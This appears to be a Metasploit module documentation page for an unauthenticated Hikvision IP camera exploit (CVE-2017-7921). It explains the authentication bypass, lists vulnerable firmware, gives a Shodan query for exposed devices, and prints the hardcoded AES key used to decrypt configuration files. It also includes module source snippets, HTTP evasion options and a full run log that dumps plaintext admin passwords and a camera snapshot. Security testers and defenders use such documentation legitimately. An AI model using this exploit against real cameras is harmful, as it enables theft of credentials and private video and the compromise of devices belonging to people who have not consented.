Unauthenticated information disclosure such as configuration, credentials and camera snapshots of a vulnerable Hikvision IP Camera - Metasploit
This page contains detailed information about how to use the auxiliary/gather/hikvision_info_disclosure_cve_2017_7921 metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Unauthenticated information disclosure such as configuration, credentials and camera snapshots of a vulnerable Hikvision IP Camera
Module: auxiliary/gather/hikvision_info_disclosure_cve_2017_7921
Source code: modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
Disclosure date: 2017-09-23
Last modification time: 2022-10-17 19:54:26 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2017-7921
Many Hikvision IP cameras have improper authorization logic that allows unauthenticated information disclosure of camera information, such as detailed hardware and software configuration, user credentials, and camera snapshots. The vulnerability has been present in Hikvision products since 2014. In addition to Hikvision-branded devices, it affects many white-labeled camera products sold under a variety of brand names. Hundreds of thousands of vulnerable devices are still exposed to the Internet at the time of publishing (shodan search: "App-webs" "200 OK"). This module allows the attacker to retrieve this information without any authentication. The information is stored in loot for future use.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Basic Usage
msf > use auxiliary/gather/hikvision_info_disclosure_cve_2017_7921
msf auxiliary(hikvision_info_disclosure_cve_2017_7921) > show targets
... a list of targets ...
msf auxiliary(hikvision_info_disclosure_cve_2017_7921) > set TARGET target-id
msf auxiliary(hikvision_info_disclosure_cve_2017_7921) > show options
... show and set options ...
msf auxiliary(hikvision_info_disclosure_cve_2017_7921) > exploit
Required Options
- RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
Knowledge Base
Vulnerable Application
Many Hikvision IP cameras have improper authorization logic that allows unauthenticated information disclosure of camera information, such as detailed hardware and software configuration, user credentials, and camera snapshots.
This module allows the attacker to disclose this information without the need of authenticaton by utilizing the
improper authentication logic to send a request to the server which contains an auth
parameter in the query string
containing a Base64 encoded version of the authorization in username:password
format.
Vulnerable cameras will ignore the password
parameter and will instead use the username part of this string
as the user to log in. Using user admin
will allow an attacker to retrieve and disclose any information
of the targeted device.
The vulnerability has been present in Hikvision products since 2014. In addition to Hikvision-branded devices, it affects many white-labeled camera products sold under a variety of brand names.
Below is a list of vulnerable firmware, but many other white-labelled versions might be vulnerable.
- DS-2CD2xx2F-I Series: V5.2.0 build 140721 to V5.4.0 build 160530
- DS-2CD2xx0F-I Series: V5.2.0 build 140721 to V5.4.0 Build 160401
- DS-2CD2xx2FWD Series: V5.3.1 build 150410 to V5.4.4 Build 161125
- DS-2CD4x2xFWD Series: V5.2.0 build 140721 to V5.4.0 Build 160414
- DS-2CD4xx5 Series: V5.2.0 build 140721 to V5.4.0 Build 160421
- DS-2DFx Series: V5.2.0 build 140805 to V5.4.5 Build 160928
- DS-2CD63xx Series: V5.0.9 build 140305 to V5.3.5 Build 160106
Installing a vulnerable test bed requires a Hikvision camera with the vulnerable firmware loaded.
Verification Steps
This module has been tested against a Hikvision camera with the specifications listed below:
- MANUFACTURER: Hikvision.China
- MODEL: DS-2CD2142FWD-IS
- FIRMWARE VERSION: V5.4.1
- FIRMWARE RELEASE: build 160525
- BOOT VERSION: V1.3.4
- BOOT RELEASE: 100316
use auxiliary/gather/hikvision_info_disclosure_cve_2017_7921
set RHOSTS <TARGET HOSTS>
set RPORT <port>
check
set PRINT true
set ACTION Automatic
run
- You should get a full disclosure of all camera information supported by this module.
Options
This option allows you print all information collected to the console during execution except for camera snapshots.
Actions
Automatic
Retrieves all information suported by this module
Configuration
Retrieves the camera hardware and software configuration
Credentials
Retrieves all configured users including the passwords in plain text format and stores them in the database.
This can be checked by using the command creds -O <target IP>
at the Metasploit prompt.
Snapshot
Takes a camera snapshot and stores it as a JPEG file in loot.
All information disclosed is by default stored in loot
Scenarios
Hikvision Camera DS-2CD2142FWD-IS -> firmware version V5.4.1, build 160525
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set rhosts 192.168.100.180
rhosts => 192.168.100.180
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set ACTION Automatic
ACTION => Automatic
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set PRINT true
PRINT => true
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > options
Module options (auxiliary/gather/hikvision_info_disclosure_cve_2017_7921):
Name Current Setting Required Description
---- --------------- -------- -----------
PRINT true no Print output to console (not applicable for snapshot)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.100.180 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
Automatic Dump all information
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > check
[+] 192.168.100.180:80 - The target is vulnerable.
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > run
[*] Running module against 192.168.100.180
[*] Running in automatic mode
[*] Getting the user credentials...
[*] Credentials for user:admin are added to the database...
[*] Credentials for user:admln are added to the database...
[*] User Credentials Information:
-----------------------------
Username:admin | ID:1 | Role:Administrator | Password: Pa$$W0rd
Username:admln | ID:2 | Role:Operator | Password: asdf1234
[+] User credentials are successfully saved to /root/.msf4/loot/20221002172346_default_192.168.100.180_hikvision.creden_049224.txt
[*] Getting the camera hardware and software configuration...
[*] Camera Device Information:
--------------------------
Device name: IP CAMERA
Device ID: 88
Device description: IPCamera
Device manufacturer: Hikvision.China
Device model: DS-2CD2142FWD-IS
Device S/N: DS-2CD2142FWD-IS2016HS77777777777
Device MAC: bc:ad:28:ff:ff:ff
Device firware version: V5.4.1
Device firmware release: build 160525
Device boot version: V1.3.4
Device boot release: 100316
Device hardware version: 0x0
Camera Network Information:
---------------------------
IP interface: 1
IP version: v4
IP assignment: static
IP address: 192.168.100.180
IP subnet mask: 255.255.255.0
Default gateway: 192.168.100.1
Primary DNS: 8.8.8.8
Camera Storage Information:
---------------------------
Storage volume name: HDD1
Storage volume ID: 1
Storage volume description: DAS
Storage device: HDD
Storage type: internal
Storage capacity (MB): 30543
Storage device status: HD_NORMAL
[+] Camera configuration details are successfully saved to /root/.msf4/loot/20221002172347_default_192.168.100.180_hikvision.config_549113.txt
[*] Taking a camera snapshot...
[+] Camera snapshot is successfully saved to /root/.msf4/loot/20221002172348_default_192.168.100.180_hikvision.image_963468.bin
[*] Auxiliary module execution completed
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > creds -O 192.168.100.180
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
192.168.100.180 192.168.100.180 80/tcp (http) admln asdf1234 Password
192.168.100.180 192.168.100.180 80/tcp (http) admin Pa$$W0rd Password
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) >
Limitations
No limitations are identified so far using this module.
Go back to menu.
Msfconsole Usage
Here is how the gather/hikvision_info_disclosure_cve_2017_7921 auxiliary module looks in the msfconsole:
msf6 > use auxiliary/gather/hikvision_info_disclosure_cve_2017_7921
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > show info
Name: Unauthenticated information disclosure such as configuration, credentials and camera snapshots of a vulnerable Hikvision IP Camera
Module: auxiliary/gather/hikvision_info_disclosure_cve_2017_7921
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2017-09-23
Provided by:
Monte Crypto
h00die-gr3y <[email protected]>
Module side effects:
ioc-in-logs
Module stability:
crash-safe
Module reliability:
repeatable-session
Available actions:
Name Description
---- -----------
Automatic Dump all information
Configuration Dump camera hardware and software configuration
Credentials Dump all credentials and passwords
Snapshot Take a camera snapshot
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PRINT true no Print output to console (not applicable for snapshot)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Description:
Many Hikvision IP cameras have improper authorization logic that
allows unauthenticated information disclosure of camera information,
such as detailed hardware and software configuration, user
credentials, and camera snapshots. The vulnerability has been
present in Hikvision products since 2014. In addition to
Hikvision-branded devices, it affects many white-labeled camera
products sold under a variety of brand names. Hundreds of thousands
of vulnerable devices are still exposed to the Internet at the time
of publishing (shodan search: "App-webs" "200 OK"). This module
allows the attacker to retrieve this information without any
authentication. The information is stored in loot for future use.
References:
https://nvd.nist.gov/vuln/detail/CVE-2017-7921
https://packetstormsecurity.com/files/144097
https://ipvm.com/reports/hik-exploit
https://attackerkb.com/topics/PlLehGSmxT/cve-2017-7921
http://seclists.org/fulldisclosure/2017/Sep/23
Module Options
This is a complete list of options available in the gather/hikvision_info_disclosure_cve_2017_7921 auxiliary module:
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > show options
Module options (auxiliary/gather/hikvision_info_disclosure_cve_2017_7921):
Name Current Setting Required Description
---- --------------- -------- -----------
PRINT true no Print output to console (not applicable for snapshot)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
Automatic Dump all information
Advanced Options
Here is a complete list of advanced options supported by the gather/hikvision_info_disclosure_cve_2017_7921 auxiliary module:
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > show advanced
Module advanced options (auxiliary/gather/hikvision_info_disclosure_cve_2017_7921):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
DOMAIN WORKSTATION yes The domain to use for Windows authentication
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS serve
rs
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
ForceExploit false no Override check result
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
SSLServerNameIndication no SSL/TLS Server Name Indication (SNI)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate
) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
UserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv no The User-Agent header to use for all requests
:97.0) Gecko/20100101 Firefox/97.0
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the gather/hikvision_info_disclosure_cve_2017_7921 module can do:
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > show actions
Auxiliary actions:
Name Description
---- -----------
Automatic Dump all information
Configuration Dump camera hardware and software configuration
Credentials Dump all credentials and passwords
Snapshot Take a camera snapshot
Evasion Options
Here is the full list of possible evasion options supported by the gather/hikvision_info_disclosure_cve_2017_7921 auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::shuffle_get_params false no Randomize order of GET parameters
HTTP::shuffle_post_params false no Randomize order of POST parameters
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-r
andom)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
Go back to menu.
Error Messages
This module may fail with the following error messages:
- <PEER> - Communication error occurred: <E.MESSAGE>
- <PEER> - Communication error occurred: <E.MESSAGE>
- Target server did not respond to the configuration file download request.
- Target server did not respond to the credentials request.
- No users were found in the returned CSS code!
- Could not retrieve password for user:<VALUE> from the camera configuration file!
- Response code invalid for obtaining the user credentials.
- Target server did not respond to the device info request.
- No device info was found in the returned CSS code!
- Response code invalid for obtaining camera hardware and software configuration.
- Target server did not respond to the network info request.
- No network info was found in the returned CSS code!
- Response code invalid for obtaining camera network configuration.
- Target server did not respond to the storage info request.
- No storage info was found in the returned CSS code!
- Response code invalid for obtaining camera storage configuration.
- Target server did not respond to the snapshot request.
- Response code invalid for obtaining a camera snapshot.
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
<PEER> - Communication error occurred: <E.MESSAGE>
Here is a relevant code snippet related to the "<PEER> - Communication error occurred: <E.MESSAGE>" error message:
83: 'auth' => auth.strip
84: }
85: })
86: return res
87: rescue StandardError => e
88: print_error("#{peer} - Communication error occurred: #{e.message}")
89: elog("#{peer} - Communication error occurred: #{e.message}", error: e)
90: return nil
91: end
92:
93: def report_creds(user, pwd)
<PEER> - Communication error occurred: <E.MESSAGE>
Here is a relevant code snippet related to the "<PEER> - Communication error occurred: <E.MESSAGE>" error message:
84: }
85: })
86: return res
87: rescue StandardError => e
88: print_error("#{peer} - Communication error occurred: #{e.message}")
89: elog("#{peer} - Communication error occurred: #{e.message}", error: e)
90: return nil
91: end
92:
93: def report_creds(user, pwd)
94: credential_data = {
Target server did not respond to the configuration file download request.
Here is a relevant code snippet related to the "Target server did not respond to the configuration file download request." error message:
112: # Get AES128-ECB encrypted camera configuration file with user and password information
113: uri = normalize_uri(target_uri.path, 'System', 'configurationFile')
114: aes_data = get_info(uri)
115:
116: if aes_data.nil?
117: print_error('Target server did not respond to the configuration file download request.')
118: elsif aes_data.code == 200
119: # decrypt configuration file data with the weak AES128-ECB encryption hex key: 279977f62f6cfd2d91cd75b889ce0c9a
120: decipher = OpenSSL::Cipher.new('aes-128-ecb')
121: decipher.decrypt
122: decipher.key = [AES_KEY].pack('H*') # transform hex key to 16 bits key
Target server did not respond to the credentials request.
Here is a relevant code snippet related to the "Target server did not respond to the credentials request." error message:
138: print_status('Getting the user credentials...')
139: uri = normalize_uri(target_uri.path, 'Security', 'users')
140: creds_info = get_info(uri)
141:
142: if creds_info.nil?
143: print_error('Target server did not respond to the credentials request.')
144: elsif creds_info.code == 200
145: # process XML output and store output in loot_data
146: xml_creds_info = creds_info.get_xml_document
147: if xml_creds_info.blank?
148: print_error('No users were found in the returned CSS code!')
No users were found in the returned CSS code!
Here is a relevant code snippet related to the "No users were found in the returned CSS code!" error message:
143: print_error('Target server did not respond to the credentials request.')
144: elsif creds_info.code == 200
145: # process XML output and store output in loot_data
146: xml_creds_info = creds_info.get_xml_document
147: if xml_creds_info.blank?
148: print_error('No users were found in the returned CSS code!')
149: else
150: # Download camera configuration file and and decrypt
151: text_data = decrypt_config
152: loot_data << "User Credentials Information:\n"
153: loot_data << "-----------------------------\n"
Could not retrieve password for user:<VALUE> from the camera configuration file!
Here is a relevant code snippet related to the "Could not retrieve password for user:<VALUE> from the camera configuration file!" error message:
154: xml_creds_info.css('User').each do |user|
155: unless text_data.empty?
156: # Filter out password based on user name and store credentials in the database
157: i = text_data.each_with_index.select { |text_chunk, _index| text_chunk == user.at_css('userName').content }.map { |pair| pair[1] }
158: if i.empty?
159: print_error("Could not retrieve password for user:#{user.at_css('userName').content} from the camera configuration file!")
160: else
161: pwd = text_data[i.last + 1]
162: report_creds(user.at_css('userName').content, pwd)
163: end
164: end
Response code invalid for obtaining the user credentials.
Here is a relevant code snippet related to the "Response code invalid for obtaining the user credentials." error message:
164: end
165: loot_data << "User:#{user.at_css('userName').content} | ID:#{user.at_css('id').content} | Role:#{user.at_css('userLevel').content} | Password: #{pwd}\n"
166: end
167: end
168: else
169: print_error('Response code invalid for obtaining the user credentials.')
170: end
171: unless loot_data.empty?
172: if datastore['PRINT']
173: print_status(loot_data.to_s)
174: end
Target server did not respond to the device info request.
Here is a relevant code snippet related to the "Target server did not respond to the device info request." error message:
184: print_status('Getting the camera hardware and software configuration...')
185: uri = normalize_uri(target_uri.path, 'System', 'deviceInfo')
186: device_info = get_info(uri)
187:
188: if device_info.nil?
189: print_error('Target server did not respond to the device info request.')
190: elsif device_info.code == 200
191: # process XML output and store in loot_data
192: xml_device_info = device_info.get_xml_document
193: if xml_device_info.blank?
194: print_error('No device info was found in the returned CSS code!')
No device info was found in the returned CSS code!
Here is a relevant code snippet related to the "No device info was found in the returned CSS code!" error message:
189: print_error('Target server did not respond to the device info request.')
190: elsif device_info.code == 200
191: # process XML output and store in loot_data
192: xml_device_info = device_info.get_xml_document
193: if xml_device_info.blank?
194: print_error('No device info was found in the returned CSS code!')
195: else
196: loot_data << "Camera Device Information:\n"
197: loot_data << "--------------------------\n"
198: xml_device_info.css('DeviceInfo').each do |device|
199: loot_data << "Device name: #{device.at_css('deviceName').content}\n"
Response code invalid for obtaining camera hardware and software configuration.
Here is a relevant code snippet related to the "Response code invalid for obtaining camera hardware and software configuration." error message:
210: loot_data << "Device hardware version: #{device.at_css('hardwareVersion').content}\n"
211: end
212: loot_data << "\n"
213: end
214: else
215: print_error('Response code invalid for obtaining camera hardware and software configuration.')
216: end
217:
218: # Get network configuration
219: uri = normalize_uri(target_uri.path, 'Network', 'interfaces')
220: network_info = get_info(uri)
Target server did not respond to the network info request.
Here is a relevant code snippet related to the "Target server did not respond to the network info request." error message:
218: # Get network configuration
219: uri = normalize_uri(target_uri.path, 'Network', 'interfaces')
220: network_info = get_info(uri)
221:
222: if network_info.nil?
223: print_error('Target server did not respond to the network info request.')
224: elsif network_info.code == 200
225: # process XML output and store in loot_data
226: xml_network_info = network_info.get_xml_document
227: if xml_network_info.blank?
228: print_error('No network info was found in the returned CSS code!')
No network info was found in the returned CSS code!
Here is a relevant code snippet related to the "No network info was found in the returned CSS code!" error message:
223: print_error('Target server did not respond to the network info request.')
224: elsif network_info.code == 200
225: # process XML output and store in loot_data
226: xml_network_info = network_info.get_xml_document
227: if xml_network_info.blank?
228: print_error('No network info was found in the returned CSS code!')
229: else
230: loot_data << "Camera Network Information:\n"
231: loot_data << "---------------------------\n"
232: xml_network_info.css('NetworkInterface').each do |interface|
233: loot_data << "IP interface: #{interface.at_css('id').content}\n"
Response code invalid for obtaining camera network configuration.
Here is a relevant code snippet related to the "Response code invalid for obtaining camera network configuration." error message:
245: end
246: end
247: loot_data << "\n"
248: end
249: else
250: print_error('Response code invalid for obtaining camera network configuration.')
251: end
252:
253: # Get storage configuration
254: uri = normalize_uri(target_uri.path, 'System', 'Storage', 'volumes')
255: storage_info = get_info(uri)
Target server did not respond to the storage info request.
Here is a relevant code snippet related to the "Target server did not respond to the storage info request." error message:
253: # Get storage configuration
254: uri = normalize_uri(target_uri.path, 'System', 'Storage', 'volumes')
255: storage_info = get_info(uri)
256:
257: if storage_info.nil?
258: print_error('Target server did not respond to the storage info request.')
259: elsif storage_info.code == 200
260: # process XML output and store in loot
261: xml_storage_info = storage_info.get_xml_document
262: if xml_storage_info.blank?
263: print_error('No storage info was found in the returned CSS code!')
No storage info was found in the returned CSS code!
Here is a relevant code snippet related to the "No storage info was found in the returned CSS code!" error message:
258: print_error('Target server did not respond to the storage info request.')
259: elsif storage_info.code == 200
260: # process XML output and store in loot
261: xml_storage_info = storage_info.get_xml_document
262: if xml_storage_info.blank?
263: print_error('No storage info was found in the returned CSS code!')
264: else
265: loot_data << "Camera Storage Information:\n"
266: loot_data << "---------------------------\n"
267: xml_storage_info.css('StorageVolume').each do |volume|
268: loot_data << "Storage volume name: #{volume.at_css('volumeName').content}\n"
Response code invalid for obtaining camera storage configuration.
Here is a relevant code snippet related to the "Response code invalid for obtaining camera storage configuration." error message:
273: loot_data << "Storage capacity (MB): #{volume.at_css('capacity').content}\n"
274: loot_data << "Storage device status: #{volume.at_css('status').content}\n"
275: end
276: end
277: else
278: print_error('Response code invalid for obtaining camera storage configuration.')
279: end
280: unless loot_data.empty?
281: if datastore['PRINT']
282: print_status(loot_data.to_s)
283: end
Target server did not respond to the snapshot request.
Here is a relevant code snippet related to the "Target server did not respond to the snapshot request." error message:
293: print_status('Taking a camera snapshot...')
294: uri = normalize_uri(target_uri.path, 'Streaming', 'channels', '1', 'picture?snapShotImageType=JPEG')
295: res = get_info(uri)
296:
297: if res.nil?
298: print_error('Target server did not respond to the snapshot request.')
299: elsif res.code == 200
300: jpeg_image = res.body
301: else
302: print_error('Response code invalid for obtaining a camera snapshot.')
303: end
Response code invalid for obtaining a camera snapshot.
Here is a relevant code snippet related to the "Response code invalid for obtaining a camera snapshot." error message:
297: if res.nil?
298: print_error('Target server did not respond to the snapshot request.')
299: elsif res.code == 200
300: jpeg_image = res.body
301: else
302: print_error('Response code invalid for obtaining a camera snapshot.')
303: end
304: unless jpeg_image.nil?
305: loot_path = store_loot('hikvision.image', 'jpeg/image', datastore['RHOSTS'], jpeg_image, 'snapshot', 'camera snapshot')
306: print_good("Camera snapshot is successfully saved to #{loot_path}")
307: end
Go back to menu.
Related Pull Requests
- #17225 Merged Pull Request: Update YARD documentation to use proper @return instead of @returns
- #17219 Merged Pull Request: Fix broken zabbix_login scanner regex for new versions
- #17220 Merged Pull Request: Fix pe inject payload crash
- #17196 Merged Pull Request: Msf::Post::Windows: Add Msf::Post::Windows::System mixin
- #17192 Merged Pull Request: Password Manager Pro password recovery post module
- #17213 Merged Pull Request: Update identify hash library and call
- #17207 Merged Pull Request: Add msfvenom / msfconsole support for Rust shellcode
- #17190 Merged Pull Request: Fix the Netapi32 bufptr data type
- #17174 Merged Pull Request: FLIR AX8 thermal camera unauthenticated RCE [CVE-2022-37061]
- #17142 Merged Pull Request: Apache CouchDB Erlang RCE module CVE-2022-24706
- #17168 Merged Pull Request: Add module for Webmin auth File Manager RCE (CVE-2022-0824)
References
- CVE-2017-7921
- PACKETSTORM-144097
- https://ipvm.com/reports/hik-exploit
- https://attackerkb.com/topics/PlLehGSmxT/cve-2017-7921
- http://seclists.org/fulldisclosure/2017/Sep/23
See Also
Check also the following modules related to this module:
- auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
- exploit/linux/http/hikvision_cve_2021_36260_blind
- exploit/linux/misc/hikvision_rtsp_bof
- auxiliary/gather/browser_info
- auxiliary/gather/huawei_wifi_info
- auxiliary/gather/xymon_info
- auxiliary/gather/zookeeper_info_disclosure
- auxiliary/gather/c2s_dvr_password_disclosure
- auxiliary/gather/cerberus_helpdesk_hash_disclosure
- auxiliary/gather/eventlog_cred_disclosure
- auxiliary/gather/f5_bigip_cookie_disclosure
- auxiliary/gather/flash_rosetta_jsonp_url_disclosure
- auxiliary/gather/ipcamera_password_disclosure
- auxiliary/gather/jetty_web_inf_disclosure
- auxiliary/gather/netgear_password_disclosure
- auxiliary/gather/pulse_secure_file_disclosure
- auxiliary/gather/cve_2021_27850_apache_tapestry_hmac_key
Authors
- Monte Crypto
- h00die-gr3y <h00die.gr3y[at]gmail.com>
Version
This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.